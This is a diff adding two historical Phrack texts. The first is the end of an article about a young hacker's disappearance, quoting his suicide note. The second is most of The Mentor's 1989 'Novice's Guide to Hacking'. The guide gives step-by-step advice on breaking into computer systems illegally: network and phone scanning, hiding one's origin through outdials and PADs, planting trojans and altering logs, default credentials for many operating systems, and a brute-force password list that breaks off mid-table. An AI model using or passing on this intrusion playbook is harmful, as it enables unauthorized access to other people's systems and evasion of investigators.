+public speaker who was going to tell the group in a few months how to make
+their computer systems safer from people like him.
+
+The letter, typed into his computer, then printed out and left in his room for
+someone to discover, touched on the evolution of mankind, prospects for man's
+immortality and the defeat of the aging process, nuclear war, communism versus
+capitalism, society's greed, the purpose of life, computers becoming more
+creative than man and finally -- suicide.
+
+The last page reads:
+
+"As I am writing this as of the moment, I am obviously not dead.  I do,
+however, plan on being dead before any other humans read this.  The idea is
+that I will commit suicide sometime around my 22nd birthday..."
+
+The note explained:
+
+"I was bored in school, bored traveling around the country, bored getting
+raided by the FBI, bored in prison, bored writing books, bored being bored.  I
+will probably be bored dead, but this is my risk to take."
+
+But then the note said:
+
+"Since writing the above, my plans have changed slightly.... But the point is,
+that I am going to take the money I have left in the bank (my liquid assets)
+and make a final attempt at making life worthy.  It will be a short attempt,
+and I do suspect that if it works out that none of my current friends will know
+me then.  If it doesn't work out, the news of my death will probably get
+around.  (I won't try to hide it.)"
+
+Landreth's birthday is December 26 and his best friend is not counting on
+seeing him again.
+
+"We used to joke about what you could learn about life, especially since if you
+don't believe in a God, then there's not much point to life," said Tom
+Anderson, 16, a senior at San Pasqual High School in Escondido, about 30 miles
+north of San Diego.  Anderson also has been convicted of computer hacking and
+placed on probation.
+
+Anderson was the last person to see Landreth.  It was around September 25 -- he
+does not remember exactly.  Landreth had spent a week living in Anderson's home
+so the two could share Landreth's computer.  Anderson's IBM-PC had been
+confiscated by authorities, and he wanted to complete his own book.
+
+Anderson said he and Landreth were also working on a proposal for a movie about
+their exploits.
+
+Apparently Landreth took only his house key, a passport, and the clothes on his
+back.
+
+But concern grew by October 1, when Landreth failed to keep a speaking
+engagement with a group of auditors in Ohio, for which he would have received
+$1,000 plus expenses.  Landreth may have kept a messy room and poor financial
+records, but he was reliable enough to keep a speaking engagement, said his
+friends and literary agent, Bill Gladstone, noting that Landreth's second
+manuscript was due in August and had not yet been delivered.
+
+But, the manuscript never came and Landreth has not reappeared.
+
+Steve Burnap, another close friend, said that during the summer Landreth had
+grown lackadaisical toward life.  "He just didn't seem to care much about
+anything anymore."
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Landreth eventually turned up in Seattle, Washington around the third week of
+July 1987.  Because of his breaking probation, he is back in jail finishing his
+sentence.
+
+Another individual who wanted to publicize himself is Oryan QUEST.  Ever since
+the "Crisis On Infinite Hackers" that occurred on July 21, 1987, QUEST has been
+"pumping" information to John Markoff -- a reporter for the San Francisco
+Examiner who now has moved up to the New York Times.  Almost t everything Oryan
+QUEST has told John Markoff are utter and complete lies and false boasts about
+the powerful things OQ liked to think he could do with a computer.  This in
+itself is harmless, but when it gets printed in newspapers like the New York
+Times, the general public get a misleading look at the hacker community which
+can only do us harm.  John Markoff has gone on to receive great fame as a news
+reporter and is now considered a hacker expert -- utterly ridiculous.
+_______________________________________________________________________________
+
+Infiltration
+~~~~~~~~~~~~
+One way in which the hacking community is constantly being infiltrated happens
+on some of today's best known bulletin boards.  Boards like Pirate-80 sysoped
+by Scan Man (who was also working for Telemarketing Company; a
+telecommunications reseller in Charleston, West Virginia) can be a major
+problem.  On P-80 anyone can get an account if you pay a nominal fee and from
+there a security consultant just has to start posted supplied information to
+begin to draw attention and fame as being a super hacker.  Eventually he will
+be asked to join ill-formed groups and start to appear on boards with higher
+levels of information and blend into the community.  After a while he will be
+beyond suspicion and as such he has successfully entered the phreak/hack world.
+Dan The Operator was one such agent who acted in this way and would have gone
+on being undiscovered if not for the events of SummerCon '87 whereafter he was
+exposed by Knight Lightning and Phrack Inc.
+
+
+:Knight Lightning
+
+                            "The Future Is Forever"
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
diff --git a/phrack22/4.txt b/phrack22/4.txt
new file mode 100644
index 0000000..e773cb6
--- /dev/null
+++ b/phrack22/4.txt
@@ -0,0 +1,742 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 22, File 4 of 12
+
+               +++++++++++++++++++++++++++++++++++++++++++++++++
+               |              The LOD/H Presents               |
+++++++++++++++++                                               ++++++++++++++++
+                  A Novice's Guide to Hacking- 1989 edition                 /
+                  =========================================                /
+                                     by                                   /
+                                 The Mentor                              /
+                       Legion of Doom/Legion of Hackers                 /
+                                                                       /
+                               December, 1988                         /
+                          Merry Christmas Everyone!                  /
+         +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++/
+
+
+The author hereby grants permission to reproduce, redistribute, or include this
+file in your g-file section, electronic or print newletter, or any other form
+of transmission that you choose, as long as it is kept intact and whole, with
+no ommissions, deletions, or changes.
+
+      (C) The Mentor- Phoenix Project Productions 1988,1989  512/441-3088
+
+
+Introduction:  The State of the Hack
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+After surveying a rather large g-file collection, my attention was drawn to the
+fact that there hasn't been a good introductory file written for absolute
+beginners since back when Mark Tabas was cranking them out (and almost
+*everyone* was a beginner!)  The Arts of Hacking and Phreaking have changed
+radically since that time, and as the 90's approach, the hack/phreak community
+has recovered from the Summer '87 busts (just like it recovered from the Fall
+'85 busts, and like it will always recover from attempts to shut it down), and
+the progressive media (from Reality Hackers magazine to William Gibson and
+Bruce Sterling's cyberpunk fables of hackerdom) is starting to take notice
+of us for the first time in recent years in a positive light.
+
+Unfortunately, it has also gotten more dangerous since the early 80's.  Phone
+cops have more resources, more awareness, and more intelligence than they
+exhibited in the past.  It is becoming more and more difficult to survive as a
+hacker long enough to become skilled in the art.  To this end this file is
+dedicated.  If it can help someone get started, and help them survive to
+discover new systems and new information, it will have served it's purpose, and
+served as a partial repayment to all the people who helped me out when was a
+beginner.
+
+Contents
+~~~~~~~~
+This file will be divided into four parts:
+     Part 1:  What is Hacking, A Hacker's Code of Ethics, Basic Hacking Safety
+     Part 2:  Packet Switching Networks: Telenet- How it Works, How to Use it,
+              Outdials, Network Servers, Private PADs
+     Part 3:  Identifying a Computer, How to Hack In, Operating System Defaults
+     Part 4:  Conclusion; Final Thoughts, Books to Read, Boards to Call,
+              Acknowledgements
+
+Part One:  The Basics
+~~~~~~~~~~~~~~~~~~~~~
+As long as there have been computers, there have been hackers.  In the 50's at
+the Massachusets Institute of Technology (MIT), students devoted much time and
+energy to ingenious exploration of the computers.  Rules and the law were
+disregarded in their pursuit for the 'hack.'  Just as they were enthralled with
+their pursuit of information, so are we.  The thrill of the hack is not in
+breaking the law, it's in the pursuit and capture of knowledge.
+
+To this end, let me contribute my suggestions for guidelines to follow to
+ensure that not only you stay out of trouble, but you pursue your craft without
+damaging the computers you hack into or the companies who own them.
+
+I.    Do not intentionally damage *any* system.
+II.   Do not alter any system files other than ones needed to ensure your
+      escape from detection and your future access (Trojan Horses, Altering
+      Logs, and the like are all necessary to your survival for as long as
+      possible).
+III.  Do not leave your (or anyone else's) real name, real handle, or real
+      phone number on any system that you access illegally.  They *can* and
+      will track you down from your handle!
+IV.   Be careful who you share information with.  Feds are getting trickier
+      Generally, if you don't know their voice phone number, name, and
+      occupation or haven't spoken with them voice on non-info trading
+      conversations, be wary.
+V.    Do not leave your real phone number to anyone you don't know.  This
+      includes logging on boards, no matter how k-rad they seem.  If you don't
+      know the sysop, leave a note telling some trustworthy people that will
+      validate you.
+VI.   Do not hack government computers.  Yes, there are government systems that
+      are safe to hack, but they are few and far between.  And the government
+      has inifitely more time and resources to track you down than a company
+      who has to make a profit and justify expenses.
+VII.  Don't use codes unless there is *NO* way around it (you don't have a
+      local telenet or tymnet outdial and can't connect to anything 800).  You
+      use codes long enough, you will get caught.  Period.
+VIII. Don't be afraid to be paranoid.  Remember, you *are* breaking the law.
+      It doesn't hurt to store everything encrypted on your hard disk, or
+      keep your notes buried in the backyard or in the trunk of your car.  You
+      may feel a little funny, but you'll feel a lot funnier when you when you
+      meet Bruno, your transvestite cellmate who axed his family to death.
+IX.   Watch what you post on boards.  Most of the really great hackers in the
+      country post *nothing* about the system they're currently working except
+      in the broadest sense (I'm working on a UNIX, or a COSMOS, or something
+      generic.  Not "I'm hacking into General Electric's Voice Mail
+      System" or something inane and revealing like that).
+X.    Don't be afraid to ask questions.  That's what more experienced hackers
+      are for.  Don't expect *everything* you ask to be answered, though.
+      There are some things (LMOS, for instance) that a begining hacker
+      shouldn't mess with.  You'll either get caught, or screw it up for
+      others, or both.
+XI.   Finally, you have to actually hack.  You can hang out on boards all you
+      want, and you can read all the text files in the world, but until you
+      actually start doing it, you'll never know what it's all about.  There's
+      no thrill quite the same as getting into your first system (well, ok, I
+      can thinksavea couple of biggers thrills, but you get the picture).
+
+One of the safest places to start your hacking career is on a computer system
+belonging to a college.  University computers have notoriously lax security,
+and are more used to hackers, as every college computer department ment has one
+or two, so are less likely to press charges if you should be detected.  But the
+odds of them detecting you and having the personel to committ to tracking you
+down are slim as long as you aren't destructive.
+
+If you are already a college student, this is ideal, as you can legally explore
+your computer system to your heart's desire, then go out and look for similar
+systems that you can penetrate with confidence, as you're already
+familar with them.
+
+So if you just want to get your feet wet, call your local college.  Many of
+them will provide accounts for local residents at a nominal (under $20) charge.
+
+Finally, if you get caught, stay quiet until you get a lawyer.  Don't volunteer
+any information, no matter what kind of 'deals' they offer you.  Nothing is
+binding unless you make the deal through your lawyer, so you might as well shut
+up and wait.
+
+Part Two:  Networks
+~~~~~~~~~~~~~~~~~~~
+The best place to begin hacking (other than a college) is on one of the
+bigger networks such as Telenet.  Why?  First, there is a wide variety of
+computers to choose from, from small Micro-Vaxen to huge Crays.  Second, the
+networks are fairly well documented.  It's easier to find someone who can help
+you with a problem off of Telenet than it is to find assistance concerning your
+local college computer or high school machine.  Third, the networks are safer.
+Because of the enormous number of calls that are fielded every day by the big
+networks, it is not financially practical to keep track of where every call and
+connection are made from.  It is also very easy to disguise your location using
+the network, which makes your hobby much more secure.
+
+Telenet has more computers hooked to it than any other system in the world once
+you consider that from Telenet you have access to Tymnet, ItaPAC, JANET,
+DATAPAC, SBDN, PandaNet, THEnet, and a whole host of other networks, all of
+which you can connect to from your terminal.
+
+The first step that you need to take is to identify your local dialup port.
+This is done by dialing 1-800-424-9494 (1200 7E1) and connecting.  It will
+spout some garbage at you and then you'll get a prompt saying 'TERMINAL= '.
+This is your terminal type.  If you have vt100 emulation, type it in now.  Or
+just hit return and it will default to dumb terminal mode.
+
+You'll now get a prompt that looks like a @.  From here, type @c mail <cr> and
+then it will ask for a Username.  Enter 'phones' for the username.  When it
+asks for a password, enter 'phones' again.  From this point, it is menu driven.
+Use this to locate your local dialup, and call it back locally.  If you don't
+have a local dialup, then use whatever means you wish to connect to one long
+distance (more on this later).
+
+When you call your local dialup, you will once again go through the TERMINAL=
+stuff, and once again you'll be presented with a @.  This prompt lets you know
+you are connected to a Telenet PAD.  PAD stands for either Packet
+Assembler/Disassembler (if you talk to an engineer), or Public Access Device
+(if you talk to Telenet's marketing people.)  The first description is more
+correct.
+
+Telenet works by taking the data you enter in on the PAD you dialed into,
+bundling it into a 128 byte chunk (normally... this can be changed), and then
+transmitting it at speeds ranging from 9600 to 19,200 baud to another PAD, who
+then takes the data and hands it down to whatever computer or system it's
+connected to.  Basically, the PAD allows two computers that have different baud
+rates or communication protocols to communicate with each other over a long
+distance.  Sometimes you'll notice a time lag in the remote machines response.
+This is called PAD Delay, and is to be expected when you're sending data
+through several different links.
+
+What do you do with this PAD?  You use it to connect to remote computer
+systems by typing 'C' for connect and then the Network User Address (NUA) of
+the system you want to go to.
+
+An NUA takes the form of   031103130002520
+                           ___/___/___/
+                             |    |    |
+                             |    |    |____ network address
+                             |    |_________ area prefix
+                             |______________ DNIC
+
+
+This is a summary of DNIC's (taken from Blade Runner's file on ItaPAC)
+according to their country and network name.
+
+
+DNIC   Network Name    Country          DNIC   Network Name    Country
+_______________________________________________________________________________
+                                     |
+02041   Datanet 1       Netherlands  |  03110   Telenet         USA
+02062   DCS             Belgium      |  03340   Telepac         Mexico
+02080   Transpac        France       |  03400   UDTS-Curacau    Curacau
+02284   Telepac         Switzerland  |  04251   Isranet         Israel
+02322   Datex-P         Austria      |  04401   DDX-P           Japan
+02329   Radaus          Austria      |  04408   Venus-P         Japan
+02342   PSS             UK           |  04501   Dacom-Net       South Korea
+02382   Datapak         Denmark      |  04542   Intelpak        Singapore
+02402   Datapak         Sweden       |  05052   Austpac         Australia
+02405   Telepak         Sweden       |  05053   Midas           Australia
+02442   Finpak          Finland      |  05252   Telepac         Hong Kong
+02624   Datex-P         West Germany |  05301   Pacnet          New Zealand
+02704   Luxpac          Luxembourg   |  06550   Saponet         South Africa
+02724   Eirpak          Ireland      |  07240   Interdata       Brazil
+03020   Datapac         Canada       |  07241   Renpac          Brazil
+03028   Infogram        Canada       |  09000   Dialnet         USA
+03103   ITT/UDTS        USA          |  07421   Dompac          French Guiana
+03106   Tymnet          USA          |
+
+There are two ways to find interesting addresses to connect to.  The first and
+easiest way is to obtain a copy of the LOD/H Telenet Directory from the LOD/H
+Technical Journal 4 or 2600 Magazine.  Jester Sluggo also put out a good list
+of non-US addresses in Phrack Inc. Newsletter Issue 21.  These files will tell
+you the NUA, whether it will accept collect calls or not, what type of computer
+system it is (if known) and who it belongs to (also if known.)
+
+The second method of locating interesting addresses is to scan for them
+manually.  On Telenet, you do not have to enter the 03110 DNIC to connect to a
+Telenet host.  So if you saw that 031104120006140 had a VAX on it you wanted to
+look at, you could type @c 412 614 (0's can be ignored most of the time).
+
+If this node allows collect billed connections, it will say 412 614 CONNECTED
+and then you'll possibly get an identifying header or just a Username: prompt.
+If it doesn't allow collect connections, it will give you a message such as 412
+614 REFUSED COLLECT CONNECTION with some error codes out to the right, and
+return you to the @ prompt.
+
+There are two primary ways to get around the REFUSED COLLECT message.  The
+first is to use a Network User Id (NUI) to connect.  An NUI is a username/pw
+combination that acts like a charge account on Telenet.  To collect to node
+412 614 with NUI junk4248, password 525332, I'd type the following:
+@c 412 614,junk4248,525332  <---- the 525332 will *not* be echoed to the
+screen.  The problem with NUI's is that they're hard to come by unless you're a
+good social engineer with a thorough knowledge of Telenet (in which case you
+probably aren't reading this section), or you have someone who can provide you
+with them.
+
+The second way to connect is to use a private PAD, either through an X.25 PAD
+or through something like Netlink off of a Prime computer (more on these two
+below).
+
+The prefix in a Telenet NUA oftentimes (not always) refers to the phone Area
+Code that the computer is located in (i.e. 713 xxx would be a computer in
+Houston, Texas).  If there's a particular area you're interested in, (say, New
+York City 914), you could begin by typing @c 914 001 <cr>.  If it connects, you
+make a note of it and go on to 914 002.  You do this until you've found some
+interesting systems to play with.
+
+Not all systems are on a simple xxx yyy address.  Some go out to four or five
+digits (914 2354), and some have decimal or numeric extensions (422 121A = 422
+121.01).  You have to play with them, and you never know what you're going to
+find.  To fully scan out a prefix would take ten million attempts per prefix.
+For example, if I want to scan 512 completely, I'd have to start with 512
+00000.00 and go through 512 00000.99, then increment the address by 1 and try
+512 00001.00 through 512 00001.99.  A lot of scanning.  There are plenty of
+neat computers to play with in a 3-digit scan, however, so don't go berserk
+with the extensions.
+
+Sometimes you'll attempt to connect and it will just be sitting there after one
+or two minutes.  In this case, you want to abort the connect attempt by sending
+a hard break (this varies with different term programs, on Procomm, it's
+ALT-B), and then when you get the @ prompt back, type 'D' for disconnect.
+
+If you connect to a computer and wish to disconnect, you can type <cr> @ <cr>
+and you it should say TELENET and then give you the @ prompt.  From there, type
+D to disconnect or CONT to re-connect and continue your session uninterrupted.
+
+Outdials, Network Servers, and PADs
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+In addition to computers, an NUA may connect you to several other things. One
+of the most useful is the outdial.  An outdial is nothing more than a modem
+you can get to over telenet -- similar to the PC Pursuit concept, except that
+these don't have passwords on them most of the time.
+
+When you connect, you will get a message like 'Hayes 1200 baud outdial,
+Detroit, MI', or 'VEN-TEL 212 Modem', or possibly 'Session 1234 established on
+Modem 5588.'  The best way to figure out the commands on these is to type ? or
+H or HELP -- this will get you all the information that you need to use one.
+
+Safety tip here -- when you are hacking *any* system through a phone dialup,
+always use an outdial or a diverter, especially if it is a local phone number
+to you.  More people get popped hacking on local computers than you can
+imagine, Intra-LATA calls are the easiest things in the world to trace
+inexpensively.
+
+Another nice trick you can do with an outdial is use the redial or macro
+function that many of them have.  First thing you do when you connect is to
+invoke the 'Redial Last Number' facility.  This will dial the last number used,
+which will be the one the person using it before you typed.  Write down the
+number, as no one would be calling a number without a computer on it.  This is
+a good way to find new systems to hack.  Also, on a VENTEL modem, type 'D' for
+Display and it will display the five numbers stored as macros in the modem's
+memory.
+
+There are also different types of servers for remote Local Area Networks (LAN)
+that have many machine all over the office or the nation connected to them.
+I'll discuss identifying these later in the computer ID section.
+
+And finally, you may connect to something that says 'X.25 Communication PAD'
+and then some more stuff, followed by a new @ prompt.  This is a PAD just like
+the one you are on, except that all attempted connections are billed to the
+PAD, allowing you to connect to those nodes who earlier refused collect
+connections.
+
+This also has the added bonus of confusing where you are connecting from.  When
+a packet is transmitted from PAD to PAD, it contains a header that has the
+location you're calling from.  For instance, when you first connected to
+Telenet, it might have said 212 44A CONNECTED if you called from the 212 area
+code.  This means you were calling PAD number 44A in the 212 area.  That 21244A
+will be sent out in the header of all packets leaving the PAD.
+
+Once you connect to a private PAD, however, all the packets going out from *it*
+will have it's address on them, not yours.  This can be a valuable buffer
+between yourself and detection.
+
+Phone Scanning
+~~~~~~~~~~~~~~
+Finally, there's the time-honored method of computer hunting that was made
+famous among the non-hacker crowd by that Oh-So-Technically-Accurate movie
+Wargames.  You pick a three digit phone prefix in your area and dial every
+number from 0000 --> 9999 in that prefix, making a note of all the carriers you
+find.  There is software available to do this for nearly every computer in the
+world, so you don't have to do it by hand.
+
+Part Three:  I've Found a Computer, Now What?
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+This next section is applicable universally.  It doesn't matter how you found
+this computer, it could be through a network, or it could be from carrier
+scanning your High School's phone prefix, you've got this prompt this prompt,
+what the hell is it?
+
+I'm *NOT* going to attempt to tell you what to do once you're inside of any of
+these operating systems.  Each one is worth several G-files in its own right.
+I'm going to tell you how to identify and recognize certain OpSystems, how to
+approach hacking into them, and how to deal with something that you've never
+seen before and have know idea what it is.
+
+
+VMS -      The VAX computer is made by Digital Equipment Corporation (DEC), and
+           runs the VMS (Virtual Memory System) operating system. VMS is
+           characterized by the 'Username:' prompt.  It will not tell you if
+           you've entered a valid username or not, and will disconnect you
+           after three bad login attempts.  It also keeps track of all failed
+           login attempts and informs the owner of the account next time s/he
+           logs in how many bad login attempts were made on the account.  It is
+           one of the most secure operating systems around from the outside,
+           but once you're in there are many things that you can do to
+           circumvent system security.  The VAX also has the best set of help
+           files in the world.  Just type HELP and read to your heart's
+           content.
+
+           Common Accounts/Defaults:  [username: password [[,password]]]
+
+           SYSTEM:     OPERATOR or MANAGER or SYSTEM or SYSLIB
+           OPERATOR:   OPERATOR
+           SYSTEST:    UETP
+           SYSMAINT:   SYSMAINT or SERVICE or DIGITAL
+           FIELD:      FIELD or SERVICE
+           GUEST:      GUEST or unpassworded
+           DEMO:       DEMO  or unpassworded
+           DECNET:     DECNET
+
+
+DEC-10 -   An earlier line of DEC computer equipment, running the TOPS-10
+           operating system.  These machines are recognized by their '.'
+           prompt.  The DEC-10/20 series are remarkably hacker-friendly,
+           allowing you to enter several important commands without ever
+           logging into the system.  Accounts are in the format [xxx,yyy]
+           where xxx and yyy are integers.  You can get a listing of the
+           accounts and the process names of everyone on the system before
+           logging in with the command .systat (for SYstem STATus).  If you
+           seen an account that reads [234,1001]   BOB JONES, it might be wise
+           to try BOB or JONES or both for a password on this account.  To
+           login, you type .login xxx,yyy  and then type the password when
+           prompted for it.
+
+           The system will allow you unlimited tries at an account, and does
+           not keep records of bad login attempts.  It will also inform you if
+           the UIC you're trying (UIC = User Identification Code, 1,2 for
+           example) is bad.
+
+           Common Accounts/Defaults:
+
+           1,2:        SYSLIB or OPERATOR or MANAGER
+           2,7:        MAINTAIN
+           5,30:       GAMES
+
+UNIX -     There are dozens of different machines out there that run UNIX.
+           While some might argue it isn't the best operating system in the
+           world, it is certainly the most widely used.  A UNIX system will
+           usually have a prompt like 'login:' in lower case.  UNIX also will
+           give you unlimited shots at logging in (in most cases), and there is
+           usually no log kept of bad attempts.
+
+           Common Accounts/Defaults:  (note that some systems are case
+           sensitive, so use lower case as a general rule.  Also, many times
+           the accounts will be unpassworded, you'll just drop right in!)
+
+           root:       root
+           admin:      admin
+           sysadmin:   sysadmin or admin
+           unix:       unix
+           uucp:       uucp
+           rje:        rje
+           guest:      guest
+           demo:       demo
+           daemon:     daemon
+           sysbin:     sysbin
+
+Prime -    Prime computer company's mainframe running the Primos operating
+           system.  The are easy to spot, as the greet you with 'Primecon
+           18.23.05' or the like, depending on the version of the operating
+           system you run into.  There will usually be no prompt offered, it
+           will just look like it's sitting there.  At this point, type 'login
+           <username>'.  If it is a pre-18.00.00 version of Primos, you can hit
+           a bunch of ^C's for the password and you'll drop in.  Unfortunately,
+           most people are running versions 19+.  Primos also comes with a good
+           set of help files.  One of the most useful features of a Prime on
+           Telenet is a facility called NETLINK.  Once you're inside, type
+           NETLINK and follow the help files.  This allows you to connect to
+           NUA's all over the world using the 'nc' command.
+
+           For example, to connect to NUA 026245890040004, you would type
+           @nc :26245890040004 at the netlink prompt.
+
+           Common Accounts/Defaults:
+
+           PRIME       PRIME or PRIMOS
+           PRIMOS_CS   PRIME or PRIMOS
+           PRIMENET    PRIMENET
+           SYSTEM      SYSTEM or PRIME
+           NETLINK     NETLINK
+           TEST        TEST
+           GUEST       GUEST
+           GUEST1      GUEST
+
+HP-x000 -  This system is made by Hewlett-Packard.  It is characterized by the
+           ':' prompt.  The HP has one of the more complicated login sequneces
+           around -- you type 'HELLO SESSION NAME,USERNAME,ACCOUNTNAME,GROUP'.
+           Fortunately, some of these fields can be left blank in many cases.
+           Since any and all of these fields can be passworded, this is not the
+           easiest system to get into, except for the fact that there are
+           usually some unpassworded accounts around.  In general, if the
+           defaults don't work, you'll have to brute force it using the common
+           password list (see below.)  The HP-x000 runs the MPE operating
+           system, the prompt for it will be a ':', just like the logon prompt.
+
+           Common Accounts/Defaults:
+
+           MGR.TELESUP,PUB                      User: MGR Acct: HPONLYG rp: PUB
+           MGR.HPOFFICE,PUB                     unpassworded
+           MANAGER.ITF3000,PUB                  unpassworded
+           FIELD.SUPPORT,PUB                    user: FLD,  others unpassworded
+           MAIL.TELESUP,PUB                     user: MAIL, others unpassworded
+           MGR.RJE                              unpassworded
+           FIELD.HPPl89 ,HPPl87,HPPl89,HPPl96   unpassworded
+           MGR.TELESUP,PUB,HPONLY,HP3           unpassworded
+
+IRIS -     IRIS stands for Interactive Real Time Information System.  It
+           originally ran on PDP-11's, but now runs on many other minis.  You
+           can spot an IRIS by the 'Welcome to "IRIS" R9.1.4 Timesharing'
+           banner, and the ACCOUNT ID? prompt.  IRIS allows unlimited tries at
+           hacking in, and keeps no logs of bad attempts.  I don't know any
+           default passwords, so just try the common ones from the password
+           database below.
+
+           Common Accounts:
+
+           MANAGER
+           BOSS
+           SOFTWARE
+           DEMO
+           PDP8
+           PDP11
+           ACCOUNTING
+
+VM/CMS -   The VM/CMS operating system runs in International Business Machines
+           (IBM) mainframes.  When you connect to one of these, you will get
+           message similar to 'VM/370 ONLINE', and then give you a '.' prompt,
+           just like TOPS-10 does.  To login, you type 'LOGON <username>'.
+
+           Common Accounts/Defaults are:
+
+           AUTOLOG1:            AUTOLOG or AUTOLOG1
+           CMS:                 CMS
+           CMSBATCH:            CMS or CMSBATCH
+           EREP:                EREP
+           MAINT:               MAINT or MAINTAIN
+           OPERATNS:            OPERATNS or OPERATOR
+           OPERATOR:            OPERATOR
+           RSCS:                RSCS
+           SMART:               SMART
+           SNA:                 SNA
+           VMTEST:              VMTEST
+           VMUTIL:              VMUTIL
+           VTAM:                VTAM
+
+NOS -      NOS stands for Networking Operating System, and runs on the Cyber
+           computer made by Control Data Corporation.  NOS identifies itself
+           quite readily, with a banner of 'WELCOME TO THE NOS SOFTWARE SYSTEM.
+           COPYRIGHT CONTROL DATA 1978,1987.'  The first prompt you will get
+           will be FAMILY:.  Just hit return here.  Then you'll get a USER
+           NAME: prompt.  Usernames are typically 7 alpha-numerics characters
+           long, and are *extremely* site dependent.  Operator accounts begin
+           with a digit, such as 7ETPDOC.
+
+           Common Accounts/Defaults:
+
+           $SYSTEM              unknown
+           SYSTEMV              unknown
+
+Decserver- This is not truly a computer system, but is a network server that
+           has many different machines available from it.  A Decserver will say
+           'Enter Username>' when you first connect.  This can be anything, it
+           doesn't matter, it's just an identifier.  Type 'c', as this is the
+           least conspicuous thing to enter.  It will then present you with a
+           'Local>' prompt.  From here, you type 'c <systemname>' to connect to
+           a system.  To get a list of system names, type 'sh services' or 'sh
+           nodes'.  If you have any problems, online help is available with the
+           'help' command.  Be sure and look for services named 'MODEM' or
+           'DIAL' or something similar, these are often outdial modems and can
+           be useful!
+GS/1 -     Another type of network server.  Unlike a Decserver, you can't
+           predict what prompt a GS/1 gateway is going to give you.  The
+           default prompt it 'GS/1>', but this is redifinable by the system
+           administrator.  To test for a GS/1, do a 'sh d'.  If that prints out
+           a large list of defaults (terminal speed, prompt, parity, etc...),
+           you are on a GS/1.  You connect in the same manner as a Decserver,
+           typing 'c <systemname>'.  To find out what systems are available, do
+           a 'sh n' or a 'sh c'.  Another trick is to do a 'sh m', which will
+           sometimes show you a list of macros for logging onto a system.  If
+           there is a macro named VAX, for instance, type 'do VAX'.
+
+           The above are the main system types in use today.  There are
+           hundreds of minor variants on the above, but this should be enough
+           to get you started.
+
+Unresponsive Systems
+~~~~~~~~~~~~~~~~~~~~
+Occasionally you will connect to a system that will do nothing, but sit there.
+This is a frustrating feeling, but a methodical approach to the system will
+yield a response if you take your time.  The following list will usually make
+*something* happen.
+
+1)  Change your parity, data length, and stop bits.  A system that won't
+    respond at 8N1 may react at 7E1 or 8E2 or 7S2.  If you don't have a term
+    program that will let you set parity to EVEN, ODD, SPACE, MARK, and NONE,
+    with data length of 7 or 8, and 1 or 2 stop bits, go out and buy one.
+    While having a good term program isn't absolutely necessary, it sure is
+    helpful.
+2)  Change baud rates.  Again, if your term program will let you choose odd
+    baud rates such as 600 or 1100, you will occasionally be able to penetrate
+    some very interesting systems, as most systems that depend on a strange
+    baud rate seem to think that this is all the security they need...
+3)  Send a series of <cr>'s.
+4)  Send a hard break followed by a <cr>.
+5)  Type a series of .'s (periods).  The Canadian network Datapac responds to
+    this.
+6)  If you're getting garbage, hit an 'i'.  Tymnet responds to this, as does a
+    MultiLink II.
+7)  Begin sending control characters, starting with ^A --> ^Z.
+8)  Change terminal emulations.  What your vt100 emulation thinks is garbage
+    may all of a sudden become crystal clear using ADM-5 emulation.  This also
+    relates to how good your term program is.
+9)  Type LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, LOGON, GO,
+    JOIN, HELP, and anything else you can think of.
+10) If it's a dialin, call the numbers around it and see if a company answers.
+    If they do, try some social engineering.
+
+Brute Force Hacking
+~~~~~~~~~~~~~~~~~~~
+There will also be many occasions when the default passwords will not work on
+an account.  At this point, you can either go onto the next system on your
+list, or you can try to 'brute-force' your way in by trying a large database of
+passwords on that one account.  Be careful, though!  This works fine on systems
+that don't keep track of invalid logins, but on a system like a VMS, someone is
+going to have a heart attack if they come back and see '600 Bad Login Attempts
+Since Last Session' on their account.  There are also some operating systems
+that disconnect after 'x' number of invalid login attempts and refuse to allow
+any more attempts for one hour, or ten minutes, or sometimes until the next
+day.
+
+The following list is taken from my own password database plus the database of
+passwords that was used in the Internet UNIX Worm that was running around in
+November of 1988.  For a shorter group, try first names, computer terms, and
+obvious things like 'secret', 'password', 'open', and the name of the account.
+Also try the name of the company that owns the computer system (if known), the
+company initials, and things relating to the products the company makes or
+deals with.
+                              Password List
+                              =============
+
+      aaa                daniel             jester             rascal
+      academia           danny              johnny             really
+      ada                dave               joseph             rebecca
+      adrian             deb                joshua             remote
+      aerobics           debbie             judith             rick
+      airplane           deborah            juggle             reagan
+      albany             december           julia              robot
+      albatross          desperate          kathleen           robotics
+      albert             develop            kermit             rolex
+      alex               diet               kernel             ronald
+      alexander          digital            knight             rosebud
+      algebra            discovery          lambda             rosemary
+      alias              disney             larry              roses
+      alpha              dog                lazarus            ruben
+      alphabet           drought            lee                rules
+      ama                duncan             leroy              ruth
+      amy                easy               lewis              sal
+      analog             eatme              light              saxon
+      anchor             edges              lisa               scheme
+      andy               erenity
+      arrow              elizabeth          maggot             sex
+      arthur             ellen              magic              shark
+      asshole            emerald            malcolm            sharon
+      athena             engine             mark               shit
+      atmosphere         engineer           markus             shiva
+      bacchus            enterprise         marty              shuttle
+      badass             enzyme             marvin             simon
+      bailey             euclid             master             simple
+      banana             evelyn             maurice            singer
+      bandit             extension          merlin             single
+      banks              fairway            mets               smile
+      bass               felicia            michael            smiles
+      batman             fender             michelle           smooch
+      beauty             fermat             mike               smother
+      beaver             finite             minimum            snatch
+      beethoven          flower             minsky             snoopy
+      beloved            foolproof          mogul              soap
+      benz               football           moose              socrates
+      beowulf            format             mozart             spit
+      berkeley           forsythe           nancy              spring
+      berlin             fourier            napoleon           subway
+      beta               fred               network            success
+      beverly            friend             newton             summer
+      angerine
+      bumbling           george             osiris             tape
+      cardinal           gertrude           outlaw             target
+      carmen             gibson             oxford             taylor
+      carolina           ginger             pacific            telephone
+      caroline           gnu                painless           temptation
+      castle             golf               pam                tiger
+      cat                golfer             paper              toggle
+      celtics            gorgeous           password           tomato
+      change             graham             pat                toyota
+      charles            gryphon            patricia           trivial
+      charming           guest              penguin            unhappy
+      charon             guitar             pete               unicorn
